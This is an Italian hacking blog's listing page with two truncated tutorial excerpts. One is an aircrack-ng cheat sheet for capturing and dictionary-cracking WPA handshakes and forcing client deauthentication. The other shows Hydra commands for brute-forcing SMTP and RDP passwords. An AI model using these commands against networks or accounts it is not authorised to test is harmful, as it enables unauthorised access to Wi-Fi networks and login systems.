Ricerca nei post

Aircrack for dummies

Attivare modalità monitor airmon-ng start NETWORKINTERFACE CANALE(opzionale) ESEMPIO: airmon-ng start eth1   Scansione di tutte le reti wireless airodump-ng NETWORKINTERFACE ESEMPIO: airodump-ng wlan0mon   Ascolto e cattura handshake mirato airodump-ng -w NOMEFILE -c CANALE –bssid BSSID NETWORKINTERFACE ESEMPIO: airodump-ng -w TPLINK.cap -c 6 –bssid 00:12:E3:52:22:01 wlan0mon   Ascolto e cattura tutti handshake airodump-ng -channel CANALE -write NOMEFILE NETWORKINTERFACE ESEMPIO: airodump-ng -channel 6 -write TPLINK.cap wlan0mon   Handshake bruteforce aircrack-ng NOMEFILE -w DIZIONARIO ESEMPIO: aircrack-ng \root\TPLINK.cap -w \root\rockyou.txt   Cambio canale scheda di rete iwconfig NETWORKINTERFACE channel CANALE ESEMPIO: iwconfig wlan0mon channel 6   Deautenticazione forzata aireplay-ng -0 TENTATIVI -a BSSIDACCESSPOINT [...]

by |24 Settembre 2018|Categorie: Hacking, Tutte le guide|tag = , , , , |0 Commenti

Bruteforce con Hydra (KaliLinux)

SMTP Brute Force hydra -s 25 -v -V -l [email protected] -P wordlist.txt -t 1 -w 20 -f smtp -l LOGIN name-P load several passwords from FILE-s port-v verbose mode-V show login+pass combination for each attempt-t run TASKS number of connects in parallel-w wait time for responses (32s) / between connects per thread-f exit after the first found login/password pair RDP Brute Force hydra -t 1 -V -f -l administrator -P wordlist.txt rdp:// -t 1 Tasks set to 1, good enough for a VM but you can up it if you have a physical pc dedicated to this, too many [...]

by |24 Settembre 2018|Categorie: Hacking, Tutte le guide|tag = , , , , , |0 Commenti